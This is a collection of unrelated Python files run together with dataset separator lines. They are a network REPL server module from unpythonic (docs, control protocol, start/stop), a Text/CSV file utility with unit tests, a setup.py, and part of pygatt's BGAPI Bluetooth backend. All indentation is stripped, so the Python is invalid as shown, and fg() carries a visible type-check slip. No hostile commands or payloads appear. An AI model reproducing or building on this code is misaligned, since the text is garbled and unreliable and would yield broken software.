can do. Connections are anonymous.
Hence, only use this server in carefully controlled environments, such as:
a) Your own local machine, with no untrusted human users on it,
b) A dedicated virtual server running only your app, in which case
the OS level already provides access control and encrypted connections.
Even then, serve this ONLY on the loopback interface, to force users to connect
to the machine via SSH first (or have physical local console access).
With that out of the way, to enable the server in your app::
from unpythonic.net import server
server.start(locals={})
The `locals=...` argument sets the top-level namespace for variables for use by
the REPL. It is shared between REPL sessions.
Using `locals=globals()` makes the REPL directly use the calling module's
top-level scope. If you want a clean environment, where you must access any
modules through `sys.modules`, use `locals={}` (recommended).
To connect to a running REPL server (with tab completion and Ctrl+C support)::
python3 -m unpythonic.net.client localhost 1337
If you're already running in a local Python REPL, this should also work::
from unpythonic.net import client
client.connect(("127.0.0.1", 1337))
For basic use (history, but no tab completion), you can use::
rlwrap netcat localhost 1337
or even just (no history, no tab completion)::
netcat localhost 1337
**CAUTION**: Python's builtin `help(foo)` does not work in this REPL server.
It cannot, because the client runs a complete second input prompt (that holds
the local TTY), separate from the input prompt running on the server.
So the stdin/stdout are not just redirected to the socket.
Trying to open the built-in help will open the help locally on the server,
causing the client to hang. The top-level `help()`, which uses a command-based
interface, appears to work, until you ask for a help page, at which point it
runs into the same problem.
As a workaround, we provide `doc(foo)`, which just prints the docstring (if any),
and performs no paging.
**CAUTION**: Python was not designed for arbitrary hot-patching. If you change
a **class** definition (whether by re-assigning the reference or by reloading
the module containing the definition), only new instances will use the new
definition, unless you specifically monkey-patch existing instances to change
their type.
The language docs hint it is somehow possible to retroactively change an
object's type, if you're careful with it:
https://docs.python.org/3/reference/datamodel.html#id8
In fact, ActiveState recipe 160164 explicitly tells how to do it,
and even automate that with a custom metaclass:
https://github.com/ActiveState/code/tree/master/recipes/Python/160164_automatically_upgrade_class_instances
Based on socketserverREPL by Ivor Wanders, 2017. Used under the MIT license.
https://github.com/iwanders/socketserverREPL
Based on macropy.core.MacroConsole by Li Haoyi, Justin Holmgren, Alberto Berti and all the other contributors,
2013-2019. Used under the MIT license.
https://github.com/azazel75/macropy
Based on imacropy.console by the same author as unpythonic. 2-clause BSD license.
https://github.com/Technologicat/imacropy
**Trivia**:
Default port is 1337, because connecting to a live Python program can be
considered somewhat that. Refer to https://megatokyo.com/strip/9.
The `socketserverREPL` package uses the same default, and actually its
`repl_tool.py` can talk to this server (but doesn't currently feature
remote tab completion).
The default port for the control channel is 8128, because it's for
*completing* things, and https://en.wikipedia.org/wiki/Perfect_number
This is the first one above 1024, and was already known to Nicomachus
around 100 CE.
"""
# TODO: use logging module instead of server-side print
# TODO: support several server instances? (makes sense if each is connected to a different module)
__all__ = ["start", "stop"] # Exports for code that wants to embed the server.
import rlcompleter # yes, just rlcompleter without readline; backend for remote tab completion.
import threading
import sys
import os
import time
import socketserver
import atexit
import inspect
from itertools import count
try:
# Advanced macro-enabled console. Importing this also boots up `mcpyrate`.
from mcpyrate.repl.console import MacroConsole as Console
except ModuleNotFoundError:
from code import InteractiveConsole as Console
from ..collections import ThreadLocalBox, Shim
from ..misc import async_raise, namelambda
from ..symbol import sym
from .util import ReuseAddrThreadingTCPServer, socketsource
from .msg import MessageDecoder
from .common import ApplevelProtocolMixin
from .ptyproxy import PTYSocketProxy
# Because "These are only defined if the interpreter is in interactive mode.",
# we have to do something like this.
# https://docs.python.org/3/library/sys.html#sys.ps1
try:
_original_ps1, _original_ps2 = sys.ps1, sys.ps2
except AttributeError:
_original_ps1, _original_ps2 = None, None
_server_instance = None
_active_sessions = {}
_session_counter = count(start=1) # for generating session ids, needed for pairing control and REPL sessions.
_halt_pending = False
_original_stdin = sys.stdin
_original_stdout = sys.stdout
_original_stderr = sys.stderr
_threadlocal_stdin = ThreadLocalBox(_original_stdin)
_threadlocal_stdout = ThreadLocalBox(_original_stdout)
_threadlocal_stderr = ThreadLocalBox(_original_stderr)
_console_locals_namespace = None
_banner = None
# --------------------------------------------------------------------------------
# Exports for REPL sessions
# These `_get_source` and `doc` functions come from `mcpyrate.repl.utils`,
# with the coloring code removed.
#
# We strictly need a local copy only if `mcpyrate` is not installed,
# to allow viewing docstrings in the stdlib console (which does not use
# colored output anyway).
def _get_source(obj):
# `inspect.getsourcefile` accepts "a module, class, method, function,
# traceback, frame, or code object" (the error message says this if
# we try it on something invalid).
#
# So if `obj` is an instance, we need to try again with its `__class__`.
for x in (obj, obj.__class__): # TODO: other places to fall back to?
try:
filename = inspect.getsourcefile(x)
source, firstlineno = inspect.getsourcelines(x)
return filename, source, firstlineno
except (TypeError, OSError):
continue
raise NotImplementedError
def doc(obj):
"""Print an object's docstring, non-interactively.
Additionally, if the information is available, print the filename
and the starting line number of the definition of `obj` in that file.
This is printed before the actual docstring.
This works around the problem that in a REPL session, the stdin/stdout
of the builtin `help()` are not properly redirected.
And that looking directly at `some_macro.__doc__` prints the string
value as-is, without formatting it.
NOTE: if you have the `mcpyrate` package installed, you can use
the IPython-like `obj?` and `obj??` syntax instead (provided by
`mcpyrate.repl.console.MacroConsole`).
"""
try:
filename, source, firstlineno = _get_source(obj)
print(f"{filename}:{firstlineno}", file=sys.stderr)
except NotImplementedError:
pass
if not hasattr(obj, "__doc__") or not obj.__doc__:
print("<no docstring>", file=sys.stderr)
return
print(inspect.cleandoc(obj.__doc__), file=sys.stderr)
# TODO: detect stdout, stderr and redirect to the appropriate stream.
def server_print(*values, **kwargs):
"""Print to the original stdout of the server process."""
print(*values, **kwargs, file=_original_stdout)
def halt(doit=True):
"""Tell the REPL server to shut down after the last client has disconnected.
To cancel a pending halt, use `halt(False)`.
"""
if doit:
msg = "Halt requested, REPL server will shut down after the last client disconnects."
else:
msg = "Halt canceled, REPL server will remain running."
global _halt_pending
_halt_pending = doit
print(msg)
server_print(msg)
_bg_results = {}
_bg_running = sym("_bg_running")
_bg_success = sym("_bg_success")
_bg_fail = sym("_bg_fail")
def bg(thunk):
"""Spawn a thread to run `thunk` in the background. Return the thread object.
To get the return value of `thunk`, see `fg`.
"""
@namelambda(thunk.__name__)
def worker():
_bg_results[thread.ident] = (_bg_running, None)
try:
result = thunk()
except Exception as err:
_bg_results[thread.ident] = (_bg_fail, err)
else:
_bg_results[thread.ident] = (_bg_success, result)
thread = threading.Thread(target=worker, name=thunk.__name__, daemon=True)
thread.start()
return thread
# TODO: we could use a better API, but I don't want timeouts or a default return value.
def fg(thread):
"""Get the return value of a `bg` thunk.
`thread` is the thread object returned by `bg` when the computation was started.
If the thread is still running, return `thread` itself.
If completed, **pop** the result. If the thread:
- returned normally: return the value.
- raised an exception: raise that exception.
"""
if "ident" not in thread:
raise TypeError(f"Expected a Thread object, got {type(thread)} with value {repr(thread)}.")
if thread.ident not in _bg_results:
raise ValueError(f"No result for thread {repr(thread)}")
# This pattern is very similar to that used by unpythonic.fun.memoize...
status, value = _bg_results[thread.ident]
if status is _bg_running:
return thread
_bg_results.pop(thread.ident)
if status is _bg_success:
return value
elif status is _bg_fail:
raise value
assert False
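# Usage sketch (illustrative) from inside a REPL session:
#     t = bg(lambda: sum(range(10**7)))  # start a background computation
#     fg(t)  # -> the sum once the thunk completes; returns `t` while still running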
# Exports available in REPL sessions.
# These will be injected to the `locals` namespace of the REPL session when the server starts.
_repl_exports = {doc, server_print, halt, bg, fg}
# --------------------------------------------------------------------------------
# Server itself
class ControlSession(socketserver.BaseRequestHandler, ApplevelProtocolMixin):
"""Entry point for connections to the control server.
We use a separate connection for control to avoid head-of-line blocking.
For example, how the remote tab completion works: the client sends us
a request. We invoke `rlcompleter` on the server side, and return its
response to the client.
"""
def handle(self):
# TODO: ipv6 support
caddr, cport = self.client_address
client_address_str = f"{caddr}:{cport}"
class ClientExit(Exception):
pass
try:
server_print(f"Control channel for {client_address_str} opened.")
# TODO: fancier backend? See examples in https://pymotw.com/3/readline/
completer_backend = rlcompleter.Completer(_console_locals_namespace)
# From the docstring of `socketserver.BaseRequestHandler`:
# This class is instantiated for each request to be handled.
# ...
# Since a separate instance is created for each request, the
# handle() method can define other arbitrary instance variables.
self.sock = self.request
self.decoder = MessageDecoder(socketsource(self.sock))
self.paired_repl_session_id = None
while True:
# The control server follows a request-reply application-level
# protocol, which is essentially a remote procedure call
# interface. We use ApplevelProtocolMixin, which allows us to
# transmit the function name, arguments and return values in
# a dictionary format.
#
# A request from the client is a dictionary, with str keys. It
# must contain the field "command", with its value set to one
# of the recognized command names as an `str`.
#
# Existence and type of any other fields depends on each
# individual command. This server source code is the official
# documentation of this small app-level protocol.
#
# For each request received, the server sends a reply, which is
# also a dictionary with str keys. It has one compulsory field:
# "status". Upon success, it must contain the string "ok". The
# actual return value(s) (if any) may be provided in arbitrary
# other fields, defined by each individual command.
#
# Upon failure, the "status" field must contain the string
# "failed". An optional (but strongly recommended!) "reason"
# field may contain a short description about the failure.
# More information may be included in arbitrary other fields.
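#
# An illustrative exchange (field values made up) for remote tab completion:
#     request: {"command": "TabComplete", "text": "pri", "state": 0}
#     reply: {"status": "ok", "result": "print("}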
request = self._recv()
if not request:
server_print(f"Socket for {client_address_str} closed by client.")
raise ClientExit
if "command" not in request:
reply = {"status": "failed", "reason": "Request is missing the 'command' field."}
elif request["command"] == "DescribeServer":
reply = {"status": "ok",
# needed by client's prompt detector
"prompts": {"ps1": sys.ps1, "ps2": sys.ps2},
# for future-proofing only
"control_protocol_version": "1.0",
"supported_commands": ["DescribeServer", "PairWithSession", "TabComplete", "KeyboardInterrupt"]}
elif request["command"] == "PairWithSession":
if "id" not in request:
reply = {"status": "failed", "reason": "Request is missing the PairWithSession parameter 'id'."}
else:
if request["id"] not in _active_sessions:
errmsg = f"Pairing control session failed; there is no active REPL session with id={request['id']}."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
server_print(f"Pairing control session for {client_address_str} to REPL session {request['id']}.")
self.paired_repl_session_id = request["id"]
reply = {"status": "ok"}
elif request["command"] == "TabComplete":
if "text" not in request or "state" not in request:
reply = {"status": "failed", "reason": "Request is missing at least one of the TabComplete parameters 'text' and 'state'."}
else:
completion = completer_backend.complete(request["text"], request["state"])
reply = {"status": "ok", "result": completion}
# server_print(request, reply)  # DEBUG
elif request["command"] == "KeyboardInterrupt":
server_print(f"Client {client_address_str} sent request for remote Ctrl+C.")
if not self.paired_repl_session_id:
errmsg = "This control channel is not currently paired with a REPL session."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
server_print(f"Remote Ctrl+C in session {self.paired_repl_session_id}.")
try:
target_session = _active_sessions[self.paired_repl_session_id]
target_thread = target_session.thread
except KeyError:
errmsg = f"REPL session {self.paired_repl_session_id} no longer active."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
except AttributeError:
errmsg = f"REPL session {self.paired_repl_session_id} has no 'thread' attribute."
reply = {"status": "failed", "reason": errmsg}
server_print(errmsg)
else:
try:
# The implementation of async_raise is one of the dirtiest hacks ever,
# and only works on Python implementations providing the `ctypes` module,
# since Python has no officially exposed mechanism to trigger an asynchronous
# exception (such as KeyboardInterrupt) in an arbitrary thread.
async_raise(target_thread, KeyboardInterrupt)
except (ValueError, SystemError, RuntimeError) as err:
server_print(err)
reply = {"status": "failed", "reason": err.args, "failure_type": str(type(err))}
else:
reply = {"status": "ok"}
else:
cmd = request["command"]
reply = {"status": "failed", "reason": f"Command '{cmd}' not understood by this server."}
self._send(reply)
except ClientExit:
server_print(f"Control channel for {client_address_str} closed.")
except BaseException as err:
server_print(err)
class ConsoleSession(socketserver.BaseRequestHandler):
"""Entry point for connections from the TCP server.
Primary channel. This serves the actual REPL session.
"""
def handle(self):
# TODO: ipv6 support
caddr, cport = self.client_address
client_address_str = f"{caddr}:{cport}"
try:
# for control/REPL pairing
self.session_id = next(_session_counter)
_active_sessions[self.session_id] = self # also for exit monitoring
# self.request is the socket. We don't need a StreamRequestHandler with self.rfile and self.wfile,
# since we in any case only forward raw bytes between the PTY master FD and the socket.
# https://docs.python.org/3/library/socketserver.html#socketserver.StreamRequestHandler
def on_socket_disconnect(adaptor):
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} disconnected by client.")
os.write(adaptor.master, "quit()\n".encode("utf-8")) # as if this text arrived from the socket
def on_slave_disconnect(adaptor):
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} disconnected by PTY slave.")
adaptor = PTYSocketProxy(self.request, on_socket_disconnect, on_slave_disconnect)
adaptor.start()
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} opened.")
# fdopen the slave side of the PTY to get file objects to work with.
# Be sure not to close the fd when exiting, it is managed by PTYSocketProxy.
#
# Note we can open the slave side in text mode, so these streams can behave
# exactly like standard input and output. The proxying between the master side
# and the network socket runs in binary mode inside PTYSocketProxy.
with open(adaptor.slave, "wt", encoding="utf-8", closefd=False) as wfile:
with open(adaptor.slave, "rt", encoding="utf-8", closefd=False) as rfile:
# Set up the input and output streams for the thread we are running in.
# We use ThreadingTCPServer, so each connection gets its own thread.
# Here we just send the relevant object into each thread-local box.
_threadlocal_stdin << rfile
_threadlocal_stdout << wfile
_threadlocal_stderr << wfile
self.thread = threading.current_thread() # needed by remote Ctrl+C
# This must be the first thing printed by the server, so that the client
# can get the session id from it. This hack is needed for netcat compatibility.
#
# (In case of the custom client, it establishes two independent TCP connections.
# The REPL session must give an ID for attaching the control channel, but since
# we want it to remain netcat-compatible, it can't use the message protocol to
# send that information.)
print(f"REPL session {self.session_id} connected.") # print at the *client* side
if _banner != "":
print(_banner)
self.console = Console(locals=_console_locals_namespace)
# All errors except SystemExit are caught inside interact().
try:
server_print(f"Opening REPL session {self.session_id} for {client_address_str}.")
self.console.interact(banner=None, exitmsg="Bye.")
except SystemExit: # Close the connection upon server process exit.
pass
finally:
server_print(f"Closing PTY on {os.ttyname(adaptor.slave)} for {client_address_str}.")
adaptor.stop()
server_print(f"Closing REPL session {self.session_id} for {client_address_str}.")
except BaseException as err: # yes, SystemExit and KeyboardInterrupt, too.
server_print(err)
finally:
del _active_sessions[self.session_id]
# TODO: IPv6 support
def start(locals, bind="127.0.0.1", repl_port=1337, control_port=8128, banner=None):
"""Start the REPL server.
bind: Interface to bind to. The default value is recommended,
to accept connections from the local machine only.
repl_port: TCP port number for main channel (REPL session).
control_port: TCP port number for the control channel (tab completion
and Ctrl+C requests).
locals: Namespace (dict-like) to use as the locals namespace
of REPL sessions that connect to this server. It is
shared between sessions.
Some useful values for `locals`:
- `{}`, to make a clean environment which is seen by
the REPL sessions only. Maybe the most pythonic.
- `globals()`, the top-level namespace of the calling
module. Can be convenient, especially if the server
is started from your main module.
This is not set automatically, because explicit is
better than implicit.
In any case, note you can just grab modules from
`sys.modules` if you need to access their top-level scopes.
banner: Startup message. Default is to show help for usage.
To suppress, use banner="".
To connect to the REPL server (assuming default settings)::
python3 -m unpythonic.net.client localhost
**NOTE**: Currently, only one REPL server is supported per process,
but it accepts multiple simultaneous connections. A new thread is
spawned to serve each new connection.
**CAUTION**: There is absolutely no authentication support, so it is
recommended to only serve to localhost, and only on a machine whose
users you trust.
"""
global _server_instance, _console_locals_namespace
if _server_instance is not None:
raise RuntimeError("The current process already has a running REPL server.")
_console_locals_namespace = locals
for function in _repl_exports: # Inject REPL utilities
_console_locals_namespace[function.__name__] = function
global _banner
if banner is None:
default_msg = ("Unpythonic REPL server at {addr}:{port}, on behalf of:\n"
" {argv}\n"
" quit(), exit() or EOF (Ctrl+D) at the prompt disconnects this session.\n"
" halt() tells the server to close after the last session has disconnected.\n"
" print() prints in the REPL session.\n"
" NOTE: print() is only properly redirected in the session's main thread.\n"
" doc(obj) shows obj's docstring. Use this instead of help(obj) in the REPL.\n"
" server_print(...) prints on the stdout of the server.\n"
" A very limited form of job control is available:\n"
" bg(thunk) spawns and returns a background thread that runs thunk.\n"
" fg(thread) pops the return value of a background thread.\n"
" If you stash the thread object in the REPL locals, you can disconnect the\n"
" session, and read the return value in another session later.")
_banner = default_msg.format(addr=bind, port=repl_port, argv=" ".join(sys.argv))
else:
_banner = banner
# Set the prompts. We use four "." to make semi-sure the prompt string only appears as a prompt.
# The client needs to identify the prompts from the data stream in order to know when to switch
# between listening and prompting, so "..." is not even semi-safe (it's valid Python, as well as
# valid English).
sys.ps1 = ">>>> "
sys.ps2 = ".... "
# We use a combo of Shim and ThreadLocalBox to redirect attribute lookups
# to the thread-specific read/write streams.
#
# sys.stdin et al. are replaced by shims, which hold their targets in
# thread-local boxes. In the main thread (and as a default), the boxes contain
# the original sys.stdin et al., whereas in session threads, the boxes are filled
# with streams established for that particular session.
sys.stdin = Shim(_threadlocal_stdin)
sys.stdout = Shim(_threadlocal_stdout)
sys.stderr = Shim(_threadlocal_stderr)
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.server_address
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.RequestHandlerClass
server = ReuseAddrThreadingTCPServer((bind, repl_port), ConsoleSession)
server.daemon_threads = True # Allow Python to exit even if there are REPL sessions alive.
server_thread = threading.Thread(target=server.serve_forever, name="Unpythonic REPL server", daemon=True)
server_thread.start()
# Control channel for remote tab completion and remote Ctrl+C requests.
# Default port is 8128 because it's for *completing* things, and https://en.wikipedia.org/wiki/Perfect_number
# This is the first one above 1024, and was already known to Nicomachus around 100 CE.
cserver = ReuseAddrThreadingTCPServer((bind, control_port), ControlSession)
cserver.daemon_threads = True
cserver_thread = threading.Thread(target=cserver.serve_forever, name="Unpythonic REPL control server", daemon=True)
cserver_thread.start()
_server_instance = (server, server_thread, cserver, cserver_thread)
atexit.register(stop)
return bind, repl_port, control_port
def stop():
"""Stop the REPL server.
If the server has been started, this will be called automatically when the
process exits. It can be called earlier manually to shut down the server if
desired.
"""
global _server_instance, _console_locals_namespace
if _server_instance is not None:
server, server_thread, cserver, cserver_thread = _server_instance
server.shutdown()
server.server_close()
server_thread.join()
cserver.shutdown()
cserver.server_close()
cserver_thread.join()
_server_instance = None
sys.stdin = _original_stdin
sys.stdout = _original_stdout
sys.stderr = _original_stderr
_console_locals_namespace = None
atexit.unregister(stop)
if _original_ps1:
sys.ps1 = _original_ps1
else:
delattr(sys, "ps1")
if _original_ps2:
sys.ps2 = _original_ps2
else:
delattr(sys, "ps2")
# demo app
def main():
server_print("REPL server starting...")
bind, repl_port, control_port = start(locals={})
server_print(f"Started REPL server on {bind}:{repl_port}.")
try:
while True:
time.sleep(1)
if _halt_pending and not _active_sessions:
break
server_print("REPL server closed.")
except KeyboardInterrupt:
server_print("Server process got Ctrl+C, closing REPL server and all connections NOW.")
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# standard
from collections import defaultdict, OrderedDict
import csv
import sys
import tempfile
import unittest
class File:
'''
An abstract class simplifying file access through the use of only two functions:
- read (filename)
- write (data, filename)
'''
@classmethod
def read(cls, filename):
'''
return file elements in a generator
'''
raise NotImplementedError  # abstract method; subclasses must override
@classmethod
def write(cls, data, filename):
'''
write data to filename
'''
raise NotImplementedError  # abstract method; subclasses must override
@staticmethod
def decomment(file, comment):
for row in file:
if comment is None:
yield row
else:
raw = row.split(comment)[0].strip()
if raw:
yield raw
class Text(File):
'''
Instantiate the File class for a simple text file
'''
@classmethod
def read(cls, filename, comment=None, blanklines=False, strip=True):
'''
- comment: comment marker; text from the marker onward is ignored
- blanklines: if True, keep blank lines (default skips them)
- strip: strip whitespace (if False, strip only trailing whitespace)
'''
def line(d):
if comment is None:
return d
elif comment not in d:
return d
else:
return d[:d.index(comment)].strip()
with open(filename, 'rt') as f:
for datum in f:
if strip:
d = datum.strip()
else:
d = datum.rstrip()
if blanklines:
yield line(d)
elif len(d) > 0:
remnant = line(d)
if len(remnant) > 0:
yield remnant
@classmethod
def write(cls,
data,
filename,
eol='\n' # explicitly change the End of Line marker
):
if filename is None:
f = sys.stdout
else:
f = open(filename, 'wt')
with f:
for datum in data:
f.write(datum + eol)
class CSV(File):
'''
Instantiate the File class for Comma Separated Values (CSV)
'''
@classmethod
def read(cls,
filename,
header=True,
comment=None,
fields=None):
'''
- header: is first line the header?
- comment: optional comment marker; commented text is ignored
- fields: optional list of field names
'''
with open(filename, 'rt') as file:
csv_file = csv.reader(File.decomment(file, comment))
for i, record in enumerate(csv_file):
if len(record) == 0:
continue
record = [f.strip() for f in record]
if header:
if i == 0:
if fields is None:
fields = record
else:
yield OrderedDict(list(zip(fields, record)))
else:
yield record
@classmethod
def write(cls,
data,
filename=None,
fields=None,
header=True,
append=False,
delimiter=','):
'''
- fields: optional list of field names
- header: display header on first line?
- append: add to existing file?
- delimiter: what character to use for separating elements
'''
def formatter(datum, fields):
if not isinstance(datum, dict):
return dict(list(zip(fields, [str(d) for d in datum])))
else:
d = defaultdict()
for field in fields:
if field in datum:
d[field] = datum[field]
return d
if append:
mode = 'a'
else:
mode = 'w'
if filename is None:
f = sys.stdout
elif sys.version_info < (3, 0, 0):
mode += 'b'
f = open(filename, mode)
else:
f = open(filename, mode, newline='')
with f as csv_file:
first = True
for datum in data:
if first:
if fields is None:
if isinstance(datum, dict):
fields = list(datum.keys())
else:
fields = datum # first line is the list of fields
csv_writer = csv.DictWriter(csv_file, fields,
lineterminator='\n', delimiter=delimiter)
if header:
csv_writer.writerow(dict(list(zip(fields, fields))))
first = False
csv_writer.writerow(formatter(datum, fields))
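# Usage sketch (illustrative; the filename is made up):
#     CSV.write([{'a': 1, 'b': 2}], 'out.csv')  # writes header "a,b", then "1,2"
#     rows = list(CSV.read('out.csv'))  # [OrderedDict([('a', '1'), ('b', '2')])]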
class Test_File(unittest.TestCase):
def setUp(self):
self.named = tempfile.NamedTemporaryFile(delete=True)
self.data = [[i+str(j) for j in range(4)] for i in ['x', 'a', 'b', 'c']]
self.filename = self.named.name
def tearDown(self):
self.named.close()
def test_text(self):
data = [' '.join(datum) for datum in self.data]
Text.write(data, self.filename)
for i, same in enumerate(Text.read(self.filename)):
assert data[i] == same
def test_csv(self):
CSV.write(self.data, self.filename, header=False)
for i, same in enumerate(CSV.read(self.filename, header=True)):
assert list(same.keys()) == self.data[0]
assert list(same.values()) == self.data[i+1]
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
from setuptools import setup, find_packages
setup(
name="users",
version="0.1.0",
description="Stoic authentication service",
license="Apache",
packages=find_packages(),
)
|
nilq/baby-python
|
python
|
from __future__ import print_function
# for Python 2/3 compatibility
try:
import queue
except ImportError:
import Queue as queue
import logging
import serial
import time
import threading
from binascii import hexlify, unhexlify
from uuid import UUID
from enum import Enum
from collections import defaultdict
from pygatt.exceptions import NotConnectedError
from pygatt.backends import BLEBackend, Characteristic, BLEAddressType
from pygatt.util import uuid16_to_uuid
from . import bglib, constants
from .exceptions import BGAPIError, ExpectedResponseTimeout
from .device import BGAPIBLEDevice
from .bglib import EventPacketType, ResponsePacketType
from .packets import BGAPICommandPacketBuilder as CommandBuilder
from .error_codes import get_return_message
from .util import find_usb_serial_devices
try:
import termios
except ImportError:
# Running in Windows (not Linux/OS X/Cygwin)
serial_exception = RuntimeError
else:
serial_exception = termios.error
log = logging.getLogger(__name__)
BLED112_VENDOR_ID = 0x2458
BLED112_PRODUCT_ID = 0x0001
MAX_CONNECTION_ATTEMPTS = 10
UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute',
'descriptor', 'characteristic',
'nonstandard'])
def _timed_out(start_time, timeout):
return time.time() - start_time > timeout
def bgapi_address_to_hex(address):
address = hexlify(bytearray(
list(reversed(address)))).upper().decode('ascii')
return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2))
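# For example (illustrative), the adapter-supplied little-endian address
# b'\xab\x89\x67\x45\x23\x01' becomes "01:23:45:67:89:AB".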
class AdvertisingAndScanInfo(object):
"""
Holds the advertising and scan response packet data from a device at a given
address.
"""
def __init__(self):
self.name = ""
self.address = ""
self.rssi = None
self.packet_data = {
# scan_response_packet_type[xxx]: data_dictionary,
}
class BGAPIBackend(BLEBackend):
"""
A BLE backend for a BGAPI compatible USB adapter.
"""
def __init__(self, serial_port=None, receive_queue_timeout=0.1):
"""
Initialize the backend, but don't start the USB connection yet. Must
call .start().
serial_port -- The name of the serial port for the BGAPI-compatible
USB interface. If not provided, will attempt to auto-detect.
"""
self._lib = bglib.BGLib()
self._serial_port = serial_port
self._receive_queue_timeout = receive_queue_timeout
self._ser = None
self._receiver = None
self._running = None
self._lock = threading.Lock()
# buffer for packets received
self._receiver_queue = queue.Queue()
# State
self._num_bonds = 0 # number of bonds stored on the adapter
self._stored_bonds = [] # bond handles stored on the adapter
self._devices_discovered = {
# 'address': AdvertisingAndScanInfo,
# Note: address formatted like "01:23:45:67:89:AB"
}
self._characteristics = defaultdict(dict)
self._connections = {}
self._current_characteristic = None # used in char/descriptor discovery
self._packet_handlers = {
ResponsePacketType.sm_delete_bonding: (
self._ble_rsp_sm_delete_bonding),
ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds,
EventPacketType.attclient_attribute_value: (
self._ble_evt_attclient_attribute_value),
EventPacketType.attclient_find_information_found: (
self._ble_evt_attclient_find_information_found),
EventPacketType.connection_status: self._ble_evt_connection_status,
EventPacketType.connection_disconnected: (
self._ble_evt_connection_disconnected),
EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response,
EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status,
}
log.debug("Initialized new BGAPI backend")
def _detect_device_port(self):
log.debug("Auto-detecting serial port for BLED112")
detected_devices = find_usb_serial_devices(
vendor_id=BLED112_VENDOR_ID,
product_id=BLED112_PRODUCT_ID)
if len(detected_devices) == 0:
raise BGAPIError("Unable to auto-detect BLED112 serial port")
log.info("Found BLED112 on serial port %s",
detected_devices[0].port_name)
return detected_devices[0].port_name
def _open_serial_port(self,
max_connection_attempts=MAX_CONNECTION_ATTEMPTS):
"""
Open a connection to the named serial port, or auto-detect the first
port matching the BLED device. This will wait until data can actually be
read from the connection, so it will not return until the device is
fully booted.
max_connection_attempts -- Max number of times to retry
detecting and connecting to a device.
Raises a NotConnectedError if the device cannot connect after 10
attempts, with a short pause in between each attempt.
"""
for attempt in range(max_connection_attempts):
log.debug("Opening connection to serial port (attempt %d)",
attempt + 1)
try:
serial_port = self._serial_port or self._detect_device_port()
self._ser = None
self._ser = serial.Serial(serial_port, baudrate=115200,
timeout=0.25)
# Wait until we can actually read from the device
self._ser.read()
break
except (BGAPIError, serial.serialutil.SerialException,
serial_exception):
log.debug("Failed to open serial port", exc_info=True)
if self._ser:
self._ser.close()
elif attempt == 0:
raise NotConnectedError(
"No BGAPI compatible device detected")
self._ser = None
time.sleep(0.25)
else:
raise NotConnectedError("Unable to reconnect with USB "
"device after rebooting")
def _initialize_device(self, reset=True):
""" Prepare an opened BGAPI device for use """
self._receiver = threading.Thread(target=self._receive)
self._receiver.daemon = True
self._running = threading.Event()
self._running.set()
self._receiver.start()
# Stop any ongoing procedure
log.debug("Stopping any outstanding GAP procedure")
self.send_command(CommandBuilder.gap_end_procedure())
try:
self.expect(ResponsePacketType.gap_end_procedure)
except BGAPIError:
# Ignore any errors if there was no GAP procedure running
pass
self.disable_advertising(skip_reply=not reset)
self.set_bondable(False)
# Check to see if there are any existing connections and add them
# Request the number of currently connected modules from the adapter
self.send_command(CommandBuilder.system_get_connections())
_, connections = self.expect(ResponsePacketType.system_get_connections)
# Adapter should also generate one EventPacketType.connection_status
# for each supported connection
for _ in range(connections['maxconn']):
_, conn = self.expect(EventPacketType.connection_status)
# If any connection flags are set, this is an active connection
if conn['flags'] > 0:
# Create new ble object to insert into the adapter
ble = BGAPIBLEDevice(bgapi_address_to_hex(conn['address']),
conn['connection_handle'],
self)
# pylint: disable=protected-access
self._connections[conn['connection_handle']] = ble
def start(self, reset=True, tries=5):
"""
Connect to the USB adapter, reset its state and start a background
receiver thread.
"""
if self._running and self._running.is_set():
self.stop()
# Fail immediately if no device is attached, don't retry waiting for one
# to be plugged in.
self._open_serial_port(max_connection_attempts=1)
if reset:
log.debug("Resetting and reconnecting to device for a clean environment")
# Blow everything away and start anew.
# Only way to be sure is to burn it down and start again.
# (Aka reset remote state machine)
# Note: Could make this a conditional based on parameter if this
# happens to be too slow on some systems.
# The zero param just means we want to do a normal restart instead of
# starting a firmware update restart.
self.send_command(CommandBuilder.system_reset(0))
self._ser.flush()
self._ser.close()
# Re-open the port. On Windows, it has been observed that the
# port is not immediately available - so retry for up to 2 seconds.
start = time.time()  # time.clock() was removed in Python 3.8
retry_t = 0.2
while True:
try:
self._open_serial_port()
except Exception:
if time.time() - start > 2:
raise
else:
log.debug('Port not ready, retry in %.2f seconds...' % retry_t)
time.sleep(retry_t)
else:
break
if tries is None or not tries:
# Try at least once to open the port
tries = 1
# Sometimes when opening the port without a reset, it'll fail to respond
# So let's try to repeat the initialization process a few times
while tries:
tries -= 1
try:
self._initialize_device(reset)
return
except ExpectedResponseTimeout:
if tries:
log.info("BLED unresponsive, re-opening")
self.stop()
self._open_serial_port(max_connection_attempts=1)
continue
# If we got here, we failed to open the port
raise NotConnectedError()
def stop(self):
for device in self._connections.values():
try:
device.disconnect()
except NotConnectedError:
pass
if self._running:
if self._running.is_set():
log.debug('Stopping')
self._running.clear()
if self._receiver:
self._receiver.join()
self._receiver = None
if self._ser:
self._ser.close()
self._ser = None
def set_bondable(self, bondable):
self.send_command(
CommandBuilder.sm_set_bondable_mode(
constants.bondable['yes' if bondable else 'no']))
self.expect(ResponsePacketType.sm_set_bondable_mode)
def disable_advertising(self, skip_reply=False):
log.debug("Disabling advertising")
self.send_command(
CommandBuilder.gap_set_mode(
constants.gap_discoverable_mode['non_discoverable'],
constants.gap_connectable_mode['non_connectable']))
if not skip_reply:
self.expect(ResponsePacketType.gap_set_mode)
def send_command(self, *args, **kwargs):
with self._lock:
if self._ser is None:
log.warn("Unexpectedly not connected to USB device")
raise NotConnectedError()
